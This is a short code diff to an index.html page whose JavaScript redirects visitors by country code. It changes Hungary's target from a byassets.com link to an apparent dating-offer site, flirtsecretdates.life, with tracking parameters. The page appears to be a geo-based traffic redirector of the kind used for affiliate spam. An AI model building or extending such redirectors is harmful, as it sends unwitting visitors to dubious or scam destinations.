--- a/index.html
+++ b/index.html
@@ -31,7 +31,7 @@ function redirectURL(country) {
     } else if (country === 'GR') {
         window.location.href = 'https://byassets.com/?k=d883d99710fdbca3b534e0ee0f38bb85&type=mainstream&subtype=global';
     } else if (country === 'HU') {
-        window.location.href = 'https://byassets.com/?k=d883d99710fdbca3b534e0ee0f38bb85&type=mainstream&subtype=global';
+        window.location.href = 'https://flirtsecretdates.life/?u=mq2pd01&o=fd5kphu';
     } else if (country === 'RS') {
         window.location.href = 'https://byassets.com/?k=d883d99710fdbca3b534e0ee0f38bb85&type=mainstream&subtype=global';
     } else {
